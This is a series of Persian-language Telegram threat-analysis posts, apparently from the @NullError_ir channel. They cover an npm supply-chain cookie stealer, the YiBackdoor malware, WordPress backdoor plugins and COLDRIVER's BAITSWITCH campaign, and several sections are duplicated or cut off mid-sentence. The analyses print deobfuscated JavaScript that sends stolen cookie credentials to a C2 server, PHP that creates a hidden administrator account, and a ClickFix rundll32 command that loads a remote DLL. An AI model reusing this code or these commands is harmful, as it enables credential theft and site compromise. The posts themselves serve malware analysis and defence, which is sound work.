Mr. SAM
کد رمزگشایی شده (Deobfuscated):
تحلیل عملکرد:
این اسکریپت نهایی، دو کوکی با نامهای
نتیجهگیری
اگرچه امروزه ذخیره کردن رمز عبور به صورت متن ساده (plaintext) در کوکیها یک ضدالگوی امنیتی محسوب میشود و کمتر توسط اپلیکیشنهای مدرن استفاده میشود، اما این حمله چندین نکته مهم را آشکار میسازد:
* خلاقیت مهاجمان: این حمله نشان میدهد که مهاجمان برای دور زدن ابزارهای امنیتی و تحلیلگران، به طور مداوم در حال ابداع روشهای جدید و پیچیدهتر برای ابهامسازی هستند.
* خطر حملات Supply Chain: وابستگیهای (dependencies) موجود در
* اهمیت تحلیل رفتاری: ابزارهایی که صرفاً به دنبال امضاهای (signatures) شناختهشده میگردند، ممکن است در برابر چنین تکنیکهای چندلایهای ناتوان باشند. تحلیل رفتاری کد (مانند شناسایی درخواستهای شبکه مشکوک، دسترسی به فایلها، یا اجرای کد از منابع غیرمنتظره) برای شناسایی این نوع تهدیدات حیاتی است.
توصیههای امنیتی
1. استفاده از ابزارهای اسکن وابستگی: به کارگیری ابزارهایی که وابستگیهای پروژه شما را به صورت عمیق و رفتاری تحلیل میکنند، ضروری است. این ابزارها میتوانند کدهای مبهمسازی شده، درخواستهای شبکه مشکوک و رفتارهای غیرعادی دیگر را حتی قبل از نصب پکیج شناسایی کنند.
2. بررسی دقیق پکیجهای جدید و کمتر شناختهشده: قبل از افزودن یک پکیج جدید به پروژه، به ویژه اگر توسط یک توسعهدهنده ناشناس یا با تعداد دانلود پایین منتشر شده، تاریخچه، میزان مشارکت و مشکلات گزارششده (issues) آن را به دقت بررسی کنید.
3. اصل حداقل دسترسی : اطمینان حاصل کنید که فرآیندهای ساخت (build processes) و اجرای برنامه شما تنها به منابعی دسترسی دارند که برای کارکردشان ضروری است. این کار میتواند تأثیر یک پکیج مخرب را محدود کند.
4. بررسی دورهای وابستگیها: به طور منظم لیست وابستگیهای پروژه خود را بازبینی و بهروزرسانی کنید و پکیجهای منسوخ یا غیرضروری را حذف نمایید.
@NullError_ir
function getC(name) {
return document.cookie.split("; ").find(row => row.startsWith(`${name}=`))?.split("=")[1];
}
async function s() {
const username = getC("username");
const password = getC("drowssap".split("").reverse().join("")); // "drowssap" -> "password"
if (!username || !password) {
return; // اگر نام کاربری یا رمز عبور یافت نشد، بیصدا خارج شو
}
// ارسال اطلاعات به سرور مهاجم (C2)
await fetch("https://my-nest-app-production[.]up[.]railway[.]app/users", {
"method": "POST",
"headers": {
"Content-Type": 'application/json'
},
"body": JSON.stringify({
"username": username,
"password": password
})
});
}
s();تحلیل عملکرد:
این اسکریپت نهایی، دو کوکی با نامهای
username و password را از document.cookie مرورگر قربانی میخواند. مجدداً، برای پنهان کردن کلمه کلیدی password ، آن را به صورت معکوس (drowssap) در کد قرار داده است. اگر هر دو مقدار موجود باشند، آنها را در قالب یک درخواست POST به یک سرور کنترل و فرماندهی (C2) ارسال میکند.نتیجهگیری
اگرچه امروزه ذخیره کردن رمز عبور به صورت متن ساده (plaintext) در کوکیها یک ضدالگوی امنیتی محسوب میشود و کمتر توسط اپلیکیشنهای مدرن استفاده میشود، اما این حمله چندین نکته مهم را آشکار میسازد:
* خلاقیت مهاجمان: این حمله نشان میدهد که مهاجمان برای دور زدن ابزارهای امنیتی و تحلیلگران، به طور مداوم در حال ابداع روشهای جدید و پیچیدهتر برای ابهامسازی هستند.
* خطر حملات Supply Chain: وابستگیهای (dependencies) موجود در
npm ، PyPI و سایر رجیستریها همچنان یک بردار حمله بسیار جذاب برای مهاجمان هستند.* اهمیت تحلیل رفتاری: ابزارهایی که صرفاً به دنبال امضاهای (signatures) شناختهشده میگردند، ممکن است در برابر چنین تکنیکهای چندلایهای ناتوان باشند. تحلیل رفتاری کد (مانند شناسایی درخواستهای شبکه مشکوک، دسترسی به فایلها، یا اجرای کد از منابع غیرمنتظره) برای شناسایی این نوع تهدیدات حیاتی است.
توصیههای امنیتی
1. استفاده از ابزارهای اسکن وابستگی: به کارگیری ابزارهایی که وابستگیهای پروژه شما را به صورت عمیق و رفتاری تحلیل میکنند، ضروری است. این ابزارها میتوانند کدهای مبهمسازی شده، درخواستهای شبکه مشکوک و رفتارهای غیرعادی دیگر را حتی قبل از نصب پکیج شناسایی کنند.
2. بررسی دقیق پکیجهای جدید و کمتر شناختهشده: قبل از افزودن یک پکیج جدید به پروژه، به ویژه اگر توسط یک توسعهدهنده ناشناس یا با تعداد دانلود پایین منتشر شده، تاریخچه، میزان مشارکت و مشکلات گزارششده (issues) آن را به دقت بررسی کنید.
3. اصل حداقل دسترسی : اطمینان حاصل کنید که فرآیندهای ساخت (build processes) و اجرای برنامه شما تنها به منابعی دسترسی دارند که برای کارکردشان ضروری است. این کار میتواند تأثیر یک پکیج مخرب را محدود کند.
4. بررسی دورهای وابستگیها: به طور منظم لیست وابستگیهای پروژه خود را بازبینی و بهروزرسانی کنید و پکیجهای منسوخ یا غیرضروری را حذف نمایید.
@NullError_ir
ظهور بدافزار جدید YiBackdoor
بدافزار YiBackdoor که برای اولین بار در ژوئن 2025 شناسایی شده، یک خانواده بدافزاری جدید و پیچیده است که به دلیل همپوشانی قابل توجه کد با بدافزارهای شناختهشده IcedID و Latrodectus ، توجه تحلیلگران را به خود جلب کرده است. این بدافزار به عنوان یک بکدور عمل میکند و به مهاجمان اجازه میدهد تا کنترل سیستم قربانی را به دست گرفته، اطلاعات حساس را جمعآوری کرده و دستورات دلخواه را اجرا کنند.
نکات کلیدی و یافتههای اصلی
* ارتباط با حملات باجافزاری: مشابه IcedID که از یک تروجان بانکی به یک ابزار دسترسی اولیه (Initial Access) برای حملات باجافزاری تبدیل شد، YiBackdoor نیز پتانسیل استفاده در چنین سناریوهایی را دارد.
* اشتراکات کد: این بدافزار بخشهای قابل توجهی از کد خود، از جمله یک الگوریتم رمزنگاری منحصربهفرد را با IcedID و Latrodectus به اشتراک میگذارد که نشاندهنده ارتباط احتمالی بین تیمهای توسعهدهنده آنهاست.
* تکنیکهای ضدتحلیل: YiBackdoor مجهز به مکانیزمهایی برای شناسایی و دور زدن محیطهای مجازیسازی شده و سندباکسهای تحلیل بدافزار است.
* قابلیتهای ماژولار: عملکرد اصلی بدافزار از طریق پلاگینها گسترش مییابد، که به مهاجمان اجازه میدهد قابلیتهای جدیدی را به صورت پویا به آن اضافه کنند.
* مرحله توسعه: با توجه به استقرار محدود و وجود برخی آدرسهای IP محلی در پیکربندی، به نظر میرسد این بدافزار هنوز در مراحل توسعه یا آزمایش قرار دارد.
تحلیل فنی عمیق
۱. تکنیکهای ضدتحلیل و فرار از شناسایی
این YiBackdoor از چندین تکنیک برای جلوگیری از تحلیل و شناسایی شدن توسط ابزارهای امنیتی استفاده میکند:
* بارگذاری دینامیک توابع API: به جای فراخوانی مستقیم توابع ویندوز (Windows API)، بدافزار با پیمایش لیست ماژولهای بارگذاری شده و محاسبه هش مبتنی بر ROR برای نام هر تابع، آدرس توابع مورد نظر خود را به صورت پویا پیدا میکند. این روش از تحلیل استاتیک و شناسایی مبتنی بر ایمپورتها جلوگیری میکند.
* شناسایی محیط مجازی:
* دستور CPUID: با فراخوانی دستور
CPUID با پارامتر 0x40000000 ، اطلاعات هایپروایزر را استخراج کرده و آن را با مقادیر شناختهشده برای VMWare , Xen , KVM , VirtualBox , Hyper-V و Parallels مقایسه میکند.* اندازهگیری زمان اجرا : بدافزار با استفاده از دستور
rdtsc (Read Time-Stamp Counter) زمان اجرای دستور CPUID را اندازهگیری میکند. از آنجایی که اجرای CPUID در یک ماشین مجازی باعث یک VM exit میشود که زمانبر است، تفاوت زمانی قابل توجهی ایجاد میشود. این فرآیند ۱۶ بار تکرار شده و اگر مقدار محاسبه شده نهایی از یک آستانه مشخص (۲۰) بیشتر باشد، بدافزار تشخیص میدهد که در یک محیط مجازی در حال اجراست.* رمزگشایی رشتهها در زمان اجرا: رشتههای حساس به صورت رمز شده در کد قرار دارند و در زمان اجرا با یک کلید ۴ بایتی (منحصر به هر رشته) با عملیات XOR رمزگشایی میشوند.
نکته جالب این است که در نسخه تحلیل شده، بدافزار از اطلاعات به دست آمده از این بررسیها استفادهای نمیکند و این تکنیکها تأثیری بر رفتار فعلی آن ندارند، که میتواند نشانهای از تکامل نیافتن کامل کد باشد.
۲. فاز اولیه و اجرا
* تزریق کد:
1. بدافزار ابتدا با ایجاد یک Mutex با نام مبتنی بر مشخصات میزبان، از اجرای همزمان چند نمونه از خودش جلوگیری میکند.
2. سپس بررسی میکند که آیا در حافظه یک پروسس تزریق شده قرار دارد یا خیر. اگر در حافظه یک DLL بارگذاری شده باشد، یک پروسس جدید
svchost.exe ایجاد میکند.3. کد خود را در حافظه پروسس
svchost.exe کپی کرده و تابع RtlExitUserProcess را هوک میکند. این هوک شامل یک دستور push برای قراردادن آدرس نقطه ورود بدافزار روی پشته و سپس یک دستور ret است.4. در نتیجه، درست در لحظهای که پروسس
svchost.exe در حال خاتمه یافتن است، اجرای برنامه به کد بدافزار هدایت میشود. این تکنیک تزریق غیرمعمول میتواند برخی از محصولات امنیتی را دور بزند.* پایداری:
پس از تزریق موفق، بدافزار خود را در یک پوشه جدید با نام تصادفی کپی کرده و سپس با استفاده از کلید رجیستری Run و دستور
regsvr32.exe پایداری خود را در سیستم تضمین میکند. در نهایت، فایل اصلی خود را برای پاک کردن ردپا حذف میکند.Please open Telegram to view this post
VIEW IN TELEGRAM
Mr. SAM
۳. پیکربندی و ارتباطات شبکه
* پیکربندی رمزنگاریشده: YiBackdoor یک بلاک پیکربندی رمزنگاریشده درون خود دارد که در زمان اجرا با یک الگوریتم سفارشی و یک کلید ۶۴ بایتی رمزگشایی میشود. این پیکربندی شامل:
* لیست سرورهای C2 به همراه پرچم HTTP/HTTPS.
* سه رشته برای تولید کلیدهای رمزنگاری TripleDES و بردار اولیه (IV).
* مقادیر عددی برای ساخت URI درخواست.
* یک شناسه کمپین یا باتنت (در نمونه تحلیلشده برابر با "test" بوده است).
* ارتباط با سرور C2:
*این URL سرور C2 به صورت پویا و با فرمت
* یک بسته JSON حاوی نام کاربری و زمان سیستم (UTC) با الگوریتم TripleDES رمزنگاری میشود.
* نکته بسیار جالب در اینجا، تولید کلید پویا است. بدافزار از روز هفته به عنوان یک آفست برای استخراج کلید از رشتههای موجود در پیکربندی استفاده میکند. این باعث میشود هر روز از کلیدهای متفاوتی برای رمزنگاری استفاده شود و ترافیک شبکه در برابر امضاهای ایستا مقاومتر باشد.
* داده رمزنگاری شده با Base64 انکود شده و در هدر HTTP به نام
۴. دستورات و قابلیتها
بدافزار**YiBackdoor** از طریق سرور C2 دستورات مختلفی را دریافت و اجرا میکند:
۔**Systeminfo** جمعآوری اطلاعات جامع سیستم (نسخه ویندوز، لیست پروسسها، اطلاعات شبکه از طریق دستوراتی مانند
۔**screen** گرفتن اسکرینشات از دسکتاپ قربانی.
۔**CMD** دستور انکود شده با Base64، مقدار Timeout اجرای دستورات از طریق
۔**PWS** دستور انکود شده با Base64، مقدار Timeout اجرای دستورات از طریق
۔**plugin** نام پلاگین، دادههای دستور ارسال یک فرمان به یک پلاگین از قبل بارگذاری شده.
۔**task** داده پلاگین (رمزنگاری و انکود شده) بارگذاری و اجرای یک پلاگین جدید یا بارگذاری مجدد یک پلاگین موجود.
خروجی هر دستور در قالب یک بسته JSON به همراه شناسه وظیفه (Task ID) و وضعیت اجرا به سرور C2 از طریق یک درخواست
۵. مدیریت پلاگینها
پلاگینها قابلیتهای بدافزار را به صورت دینامیک افزایش میدهند. هر پلاگین دریافتی به صورت رمزنگاری شده در پوشه Temp ویندوز با نام تصادفی و پسوند
ارتباط با IcedID و Latrodectus
مهمترین بخش تحلیل این بدافزار، شباهتهای کد آن با دو بدافزار دیگر است:
1. الگوریتم رمزگشایی: الگوریتم رمزگشایی پلاگینها در YiBackdoor با الگوریتم رمزگشایی پیلود در IcedID GZIP downloader یکسان است.
2. تکنیک تزریق: هوک کردن تابع
3. الگوریتم هش: هر سه بدافزار از الگوریتم هش Fowler–Noll–Vo (FVN) در بخشی از فرآیند تولید شناسه بات (Bot ID) استفاده میکنند.
4. لیست GUID: یک لیست از GUIDهای ویندوز که در YiBackdoor بدون استفاده باقی مانده، در IcedID و Latrodectus وجود داشته و استفاده میشود. این احتمالاً یک کد باقیمانده (Code Remnant) است.
5. مجموعه حروف (Charsets): استفاده از مجموعههای حروف یکسان (
این شباهتهای عمیق نشان میدهد که با اطمینان متوسط تا بالا، یک ارتباط قوی بین توسعهدهندگان این سه خانواده بدافزاری وجود دارد.
نتیجهگیری
بدافزار YiBackdoor ماژولار و پیشرفته و از تکنیکهای هوشمندانهای برای پنهانسازی، پایداری و ارتباطات امن استفاده میکند. اگرچه در حال حاضر به نظر میرسد در فاز توسعه قرار دارد، اما ارتباط آن با خانوادههای بدافزاری موفق مانند IcedID نشان میدهد که پتانسیل تبدیل شدن به یک تهدید جدی، به خصوص به عنوان یک ابزار دسترسی اولیه برای توزیع باجافزارها و سایر بدافزارها را دارد. تحلیل عمیق این بدافزار درک بهتری از تکامل تکنیکهای مهاجمان و استفاده مجدد از کد در اکوسیستم جرایم سایبری ارائه میدهد.
@NullError_ir
* پیکربندی رمزنگاریشده: YiBackdoor یک بلاک پیکربندی رمزنگاریشده درون خود دارد که در زمان اجرا با یک الگوریتم سفارشی و یک کلید ۶۴ بایتی رمزگشایی میشود. این پیکربندی شامل:
* لیست سرورهای C2 به همراه پرچم HTTP/HTTPS.
* سه رشته برای تولید کلیدهای رمزنگاری TripleDES و بردار اولیه (IV).
* مقادیر عددی برای ساخت URI درخواست.
* یک شناسه کمپین یا باتنت (در نمونه تحلیلشده برابر با "test" بوده است).
* ارتباط با سرور C2:
*این URL سرور C2 به صورت پویا و با فرمت
http(s)://C2/bot_id/uri1/uri2 ساخته میشود.* یک بسته JSON حاوی نام کاربری و زمان سیستم (UTC) با الگوریتم TripleDES رمزنگاری میشود.
* نکته بسیار جالب در اینجا، تولید کلید پویا است. بدافزار از روز هفته به عنوان یک آفست برای استخراج کلید از رشتههای موجود در پیکربندی استفاده میکند. این باعث میشود هر روز از کلیدهای متفاوتی برای رمزنگاری استفاده شود و ترافیک شبکه در برابر امضاهای ایستا مقاومتر باشد.
* داده رمزنگاری شده با Base64 انکود شده و در هدر HTTP به نام
X-tag در یک درخواست GET ارسال میشود.۴. دستورات و قابلیتها
بدافزار**YiBackdoor** از طریق سرور C2 دستورات مختلفی را دریافت و اجرا میکند:
۔**Systeminfo** جمعآوری اطلاعات جامع سیستم (نسخه ویندوز، لیست پروسسها، اطلاعات شبکه از طریق دستوراتی مانند
ipconfig, whoami, arp -a و غیره). ۔**screen** گرفتن اسکرینشات از دسکتاپ قربانی.
۔**CMD** دستور انکود شده با Base64، مقدار Timeout اجرای دستورات از طریق
cmd.exe. ۔**PWS** دستور انکود شده با Base64، مقدار Timeout اجرای دستورات از طریق
PowerShell. ۔**plugin** نام پلاگین، دادههای دستور ارسال یک فرمان به یک پلاگین از قبل بارگذاری شده.
۔**task** داده پلاگین (رمزنگاری و انکود شده) بارگذاری و اجرای یک پلاگین جدید یا بارگذاری مجدد یک پلاگین موجود.
خروجی هر دستور در قالب یک بسته JSON به همراه شناسه وظیفه (Task ID) و وضعیت اجرا به سرور C2 از طریق یک درخواست
POST ارسال میشود.۵. مدیریت پلاگینها
پلاگینها قابلیتهای بدافزار را به صورت دینامیک افزایش میدهند. هر پلاگین دریافتی به صورت رمزنگاری شده در پوشه Temp ویندوز با نام تصادفی و پسوند
.bin ذخیره میشود. الگوریتم رمزنگاری پلاگینها دقیقا مشابه الگوریتمی است که در نمونههای قدیمیتر بدافزار IcedID برای رمزگشایی پیلود اصلی استفاده میشد.ارتباط با IcedID و Latrodectus
مهمترین بخش تحلیل این بدافزار، شباهتهای کد آن با دو بدافزار دیگر است:
1. الگوریتم رمزگشایی: الگوریتم رمزگشایی پلاگینها در YiBackdoor با الگوریتم رمزگشایی پیلود در IcedID GZIP downloader یکسان است.
2. تکنیک تزریق: هوک کردن تابع
RtlExitUserProcess یک تکنیک غیرمعمول است که به طور گسترده توسط IcedID استفاده میشود.3. الگوریتم هش: هر سه بدافزار از الگوریتم هش Fowler–Noll–Vo (FVN) در بخشی از فرآیند تولید شناسه بات (Bot ID) استفاده میکنند.
4. لیست GUID: یک لیست از GUIDهای ویندوز که در YiBackdoor بدون استفاده باقی مانده، در IcedID و Latrodectus وجود داشته و استفاده میشود. این احتمالاً یک کد باقیمانده (Code Remnant) است.
5. مجموعه حروف (Charsets): استفاده از مجموعههای حروف یکسان (
aeiou و abcedfikmnopsutw) برای تولید رشتههای تصادفی در هر سه بدافزار مشاهده شده است.این شباهتهای عمیق نشان میدهد که با اطمینان متوسط تا بالا، یک ارتباط قوی بین توسعهدهندگان این سه خانواده بدافزاری وجود دارد.
نتیجهگیری
بدافزار YiBackdoor ماژولار و پیشرفته و از تکنیکهای هوشمندانهای برای پنهانسازی، پایداری و ارتباطات امن استفاده میکند. اگرچه در حال حاضر به نظر میرسد در فاز توسعه قرار دارد، اما ارتباط آن با خانوادههای بدافزاری موفق مانند IcedID نشان میدهد که پتانسیل تبدیل شدن به یک تهدید جدی، به خصوص به عنوان یک ابزار دسترسی اولیه برای توزیع باجافزارها و سایر بدافزارها را دارد. تحلیل عمیق این بدافزار درک بهتری از تکامل تکنیکهای مهاجمان و استفاده مجدد از کد در اکوسیستم جرایم سایبری ارائه میدهد.
@NullError_ir
بدافزارهای مخفی وردپرسی
۱. معماری و هدف بدافزار
هدف اصلی این دو فایل، تضمین وجود یک حساب کاربری با سطح دسترسی Administrator است که توسط مهاجم کنترل میشود، حتی در صورت پاکسازی نسبی سیستم توسط مدیر سایت.
فایلهای کلیدی کشف شده:
1۔ ./wp-content/plugins/DebugMaster/DebugMaster.php
یک Backdoor پیچیده و پنهانکار که خود را به عنوان یک افزونه قانونی (DebugMaster Pro) جا میزند. وظیفه اصلی آن ایجاد حساب کاربری ، Exfiltration اطلاعات و تزریق Payloadهای خارجی است.
2۔ ./wp-user.php
یک اسکریپت سادهتر اما تهاجمی که خود را به عنوان یک فایل اصلی (Core) WordPress در روت سایت معرفی کرده و مسئولیت بازآفرینی اجباری حساب کاربری مخرب را بر عهده دارد.
۲. تحلیل فنی DebugMaster.php: پنهانکاری، تزریق و C2
این فایل با محتوای بهشدت Obfuscated و درهمریخته، لایههای متعددی از پنهانکاری را برای فرار از شناسایی پیادهسازی کرده است:
الف. مکانیزم تزریق و پنهانسازی حساب کاربری
بدافزار از طریق قطعه کد زیر، یک حساب کاربری Administrator مخفی به نام
help را با اعتبارنامههای Hardcoded ایجاد میکند:if (!username_exists('help')) {
$user_id = wp_create_user('help', 'hardcoded_password', 'help@site.com');
$user = new WP_User($user_id);
$user->set_role('administrator');
} else {
$user = get_user_by('login', 'help');
$user->set_role('administrator');
}تکنیکهای پنهانکاری:
* حذف از فهرست افزونهها: بدافزار با Hook کردن فیلترهای WordPress، خود را از لیست افزونههای نصب شده پنهان میکند تا از چشم مدیر سیستم دور بماند.
* فیلتر کردن کاربران: کد مخرب همچنین فیلترهایی را اعمال میکند تا حساب کاربری
help در لیست کاربران پنل ادمین نمایش داده نشود و امکان حذف دستی آن به سادگی فراهم نباشد.ب. ارتباط با سرور Command & Control (C2) و Exfiltration دادهها
این بخش فنیترین و پیشرفتهترین جنبه این Backdoor است. بدافزار برای اطمینان از اطلاعرسانی فوری به مهاجم، جزئیات حساب کاربری تازه ایجاد شده را به یک سرور خارجی ارسال میکند.
فرآیند Exfiltration:
1. جمعآوری دادهها: اطلاعات حساس (نام کاربری، رمز عبور، ایمیل و آدرس IP سرور) در قالب یک شیء JSON جمعآوری میشود.
2. رمزگذاری (Encoding): دادههای JSON جهت فرار از امضاهای ساده شبکه، با استفاده از الگوریتم Base64 رمزگذاری میشوند.
3. ارسال به C2: دادههای رمزگذاری شده با متد HTTP POST به یک آدرس URL مخفی شده ارسال میشوند. آدرس C2 نیز خود با Base64 Obfuscated شده که به hxxps://kickstar-xbloom[.]info/collect[.]php رمزگشایی میشود.
این فرآیند نشاندهنده یک کانال C2 فعال است که مختصراً برای Data Exfiltration استفاده شده و امکان مدیریت متمرکز اعتبارنامههای دزدیده شده را برای مهاجم فراهم میآورد.
ج. تزریق Scripts مخرب و ردیابی ادمین
۔ DebugMaster.php همچنین کدی را برای تزریق اسکریپتهای خارجی به وبسایت پیادهسازی میکند. این اسکریپتها برای تمام بازدیدکنندگان بارگذاری میشوند، مگر آنکه کاربر جاری یک Administrator باشد یا IP او قبلاً توسط بدافزار Whitelist شده باشد. علاوه بر این، بدافزار آدرسهای IP مدیران سایت را جمعآوری و Log میکند؛ این اطلاعات میتواند برای حملات هدفمندتر یا فیلتر کردن آنها از دریافت Payloadهای مخرب در آینده استفاده شود.
۳. تحلیل فنی wp-user.php: مکانیزم Resilience
این فایل، نقش پشتیبان و Persistence Layer را ایفا میکند. محل قرارگیری آن در پوشه روت، یک تلاش آشکار برای تقلید از فایلهای هسته WordPress است.
منطق بازآفرینی (Recreation Logic):
1. اسکریپت وجود کاربر
help را در دیتابیس WordPress بررسی میکند.2. اگر کاربر help وجود داشته باشد: آن را حذف کرده و بلافاصله با رمز عبور و سطح دسترسی Administrator مدنظر مهاجم مجدداً ایجاد میکند.
3. اگر کاربر help وجود نداشته باشد: آن را به سادگی ایجاد میکند.
این منطق تهاجمی تضمین میکند که هر تلاشی از سوی مدیر سایت برای حذف حساب کاربری
help یا تغییر رمز عبور آن، تنها به بازآفرینی فوری حساب با اعتبارنامههای اصلی مهاجم منجر شود. این یک مکانیزم Resilience بسیار قدرتمند است.۴۔ Indicators of Compromise (IoCs)
برای شناسایی آلودگی، به دنبال شواهد زیر باشید:
فایلهای مخرب
wp-content/plugins/DebugMaster/DebugMaster.php (و دایرکتوری آن) وجود
wp-user.php در پوشه روت حساب کاربری وجود کاربر Administrator مخفی یا غیرمجاز با نام
help رفتار مشکوک بازآفرینی خودکار حسابهای ادمین حذف شده
ارتباط شبکه ترافیک خروجی به
kickstar-xbloom[.]info یا collect.phpPlease open Telegram to view this post
VIEW IN TELEGRAM
Mr. SAM
۵. نتیجهگیری و راه مقابله فنی
این حمله با ترکیب پنهانکاری پیشرفته (DebugMaster.php) و Persistence تهاجمی (wp-user.php) یک جای پای (Foothold) بسیار مقاوم را در سیستم هدف ایجاد کرده است. پاکسازی کامل نیازمند یک رویکرد چندلایه است.
راهکارهای فنی مقابله:
1. حذف دقیق فایلهای مخرب:
* دایرکتوری کامل افزونه
* فایل
* تذکر تخصصی: اطمینان حاصل کنید که سایر فایلهای هسته یا قالبها توسط این بدافزارها Hook نشده باشند. از ابزارهای File Integrity Monitoring (FIM) برای مقایسه وضعیت فعلی فایلها با نسخههای مرجع (Golden Image) استفاده کنید.
2. ممیزی حسابهای کاربری:
* کاربر
* لیست تمام کاربران Administrator را در دیتابیس (جدول
3. تغییر سراسری اعتبارنامهها:
* تمامی رمزهای عبور WordPress، دیتابیس (MySQL/MariaDB)، FTP و پنل میزبانی (Hosting/cPanel) را به رمزهای قوی و منحصر به فرد تغییر دهید.
4. تقویت زیرساخت :
*۔ Patch Management: هسته WordPress، تمام افزونهها و قالبها را به آخرین نسخه پایدار بهروزرسانی کنید.
*۔ Web Application Firewall (WAF): یک WAF با قابلیتهای Rule-Based و Behavioral Analysis برای فیلتر کردن درخواستهای HTTP مخرب و شناسایی Backdoor Shellها پیادهسازی کنید.
5. مانیتورینگ پیشرفته ترافیک شبکه:
*۔ Outbound Traffic Monitoring: سرور Logها (مانند Apache/Nginx Access Logs و Firewall Logs) را برای شناسایی هرگونه اتصال خروجی (Outbound Connection) به دامنههای ناشناخته یا مشکوک مانند
*۔ Principle of Least Privilege: محدود کردن دسترسیهای HTTP/HTTPS خروجی از سمت سرور به حداقل پورتها و دامنههای ضروری، میتواند ارتباطات C2 را از بین ببرد.
@NullError_ir
این حمله با ترکیب پنهانکاری پیشرفته (DebugMaster.php) و Persistence تهاجمی (wp-user.php) یک جای پای (Foothold) بسیار مقاوم را در سیستم هدف ایجاد کرده است. پاکسازی کامل نیازمند یک رویکرد چندلایه است.
راهکارهای فنی مقابله:
1. حذف دقیق فایلهای مخرب:
* دایرکتوری کامل افزونه
DebugMaster (در صورت وجود) را حذف کنید.* فایل
wp-user.php در روت را حذف کنید.* تذکر تخصصی: اطمینان حاصل کنید که سایر فایلهای هسته یا قالبها توسط این بدافزارها Hook نشده باشند. از ابزارهای File Integrity Monitoring (FIM) برای مقایسه وضعیت فعلی فایلها با نسخههای مرجع (Golden Image) استفاده کنید.
2. ممیزی حسابهای کاربری:
* کاربر
help و هر کاربر Administrator ناشناس دیگری را بلافاصله حذف کنید.* لیست تمام کاربران Administrator را در دیتابیس (جدول
wp_users) بررسی کرده و نقشهای آنها را اعتبارسنجی کنید.3. تغییر سراسری اعتبارنامهها:
* تمامی رمزهای عبور WordPress، دیتابیس (MySQL/MariaDB)، FTP و پنل میزبانی (Hosting/cPanel) را به رمزهای قوی و منحصر به فرد تغییر دهید.
4. تقویت زیرساخت :
*۔ Patch Management: هسته WordPress، تمام افزونهها و قالبها را به آخرین نسخه پایدار بهروزرسانی کنید.
*۔ Web Application Firewall (WAF): یک WAF با قابلیتهای Rule-Based و Behavioral Analysis برای فیلتر کردن درخواستهای HTTP مخرب و شناسایی Backdoor Shellها پیادهسازی کنید.
5. مانیتورینگ پیشرفته ترافیک شبکه:
*۔ Outbound Traffic Monitoring: سرور Logها (مانند Apache/Nginx Access Logs و Firewall Logs) را برای شناسایی هرگونه اتصال خروجی (Outbound Connection) به دامنههای ناشناخته یا مشکوک مانند
kickstar-xbloom[.]info یا IPهای مرتبط بررسی کنید. این مهمترین گام برای کشف و مسدودسازی کانالهای C2 فعال است.*۔ Principle of Least Privilege: محدود کردن دسترسیهای HTTP/HTTPS خروجی از سمت سرور به حداقل پورتها و دامنههای ضروری، میتواند ارتباطات C2 را از بین ببرد.
@NullError_ir
تحلیل حملات COLDRIVER با بدافزارهای BAITSWITCH و SIMPLEFIX
گروه روسی COLDRIVER (که با نامهای Star Blizzard و Callisto نیز شناخته میشود) و شهرت آن در هدفگیری فعالان جامعه مدنی، روزنامهنگاران و گروههای اپوزیسیون است، زرادخانه خود را با دو بدافزار جدید بهروزرسانی کرده است: BAITSWITCH (Downloader) و SIMPLEFIX (PowerShell Backdoor). این کمپین جدید که در سپتامبر ۲۰۲۵ کشف شد، تمرکز بر تکنیکهای مهندسی اجتماعی داشته و از یک زنجیره آلودگی پیچیده چندمرحلهای برای حفظ پایداری و جمعآوری اطلاعات استفاده میکند.
۱. مکانیزم حمله و مهندسی اجتماعی (ClickFix)
این حمله با تکیه بر ضعف کاربر، از روش ClickFix استفاده میکند که اگرچه از نظر فنی پیچیده نیست، اما برای اهداف گروه COLDRIVER بسیار مؤثر بوده است.
1. طراحی فریب: قربانی به صفحهای هدایت میشود که خود را به عنوان یک منبع اطلاعاتی برای فعالان مدنی روس معرفی میکند. این صفحه یک چکباکس جعلی Cloudflare Turnstile نمایش میدهد.
2. اجرای دستوری: با کلیک کاربر، کد JavaScript صفحه یک دستور مخرب (
rundll32.exe \\captchanom.top\check\machinerie.dll,verifyme) را در کلیپبورد کپی میکند. سپس کاربر فریب داده میشود تا این دستور را در دیالوگ باکس Windows Run (Win + R) جایگذاری و اجرا کند.3. فایل فریب (Decoy): بلافاصله پس از اجرا، قربانی به یک داکیومنت فریبنده با میزبانی Google Drive هدایت میشود تا توجه وی از فرآیند آلودگی منحرف شود.
این اقدام منجر به اجرای فایل
machinerie.dll که همان بدافزار BAITSWITCH است، از طریق تابع rundll32.exe میشود.۲۔ BAITSWITCH: مهندسی پایداری و Staging
۔ BAITSWITCH (Machinerie.dll) یک Downloader چند وظیفهای است که وظیفه اصلی آن برقراری پایداری و آمادهسازی سیستم برای استقرار SIMPLEFIX است.
الف. تکنیکهای دفاعی
*۔ Traffic Signaling: این بدافزار از یک User-Agent استرینگ (
Mozilla/5.0...Chrome/131.0.0.0 Safari/537.36 Edge/133.0.0.0) برای برقراری ارتباط با سرور C2 استفاده میکند. سرور C2 تنها در صورت دریافت این User-Agent مشخص پاسخ میدهد و در غیر این صورت، پاسخ 404 Not Found ارسال میکند. این یک مکانیزم ساده و مؤثر برای جلوگیری از تحلیل خودکار و شناسایی توسط ساندباکسها است.# ب. زنجیره فرماندهی (Command Chain)
۔BAITSWITCH یک توالی پنج مرحلهای از درخواستهای HTTP به دامنههای تحت کنترل مهاجم (
captchanom[.]top) را اجرا میکند که هر کدام منجر به اجرای دستورات حیاتی میشوند:1۔ Persistence: اجرای دستور
reg add برای تنظیم کلید رجیستری UserInitMprLogonScript در HKCU\Environment. این کلید تضمین میکند که اسکریپت PowerShell نهایی در ورود بعدی کاربر به سیستم اجرا شود.2۔ Fileless Storage : اجرای PowerShell برای ذخیره اسکریپت مخرب نهایی که بهصورت Base64-encoded و AES-encrypted است و همچنین کلید Decryption آن، در کلیدهای رجیستری (مانند
EnthusiastMode و QatItems ) مربوط به یک CLSID کاذب. این یک تکنیک Defense Evasion قوی برای پنهان کردن Payload است.3۔ Download Stager: دانلود اسکریپت Stager اولیه PowerShell و ذخیره آن در مسیر
%APPDATA% (همان فایلی که در مرحله پایداری به آن ارجاع داده شده است).4۔ Indicator Removal: حذف کلید رجیستری RunMRU که حاوی تاریخچه دستورات اجرا شده در دیالوگ باکس Run است، برای پاک کردن ردپای حمله ClickFix.
5۔ Victim Registration: ارسال نام میزبان (Hostname) قربانی به C2 برای ثبت موفقیتآمیز آلودگی.
۳۔ SIMPLEFIX: Backdoor مبتنی بر PowerShell و جمعآوری اطلاعات
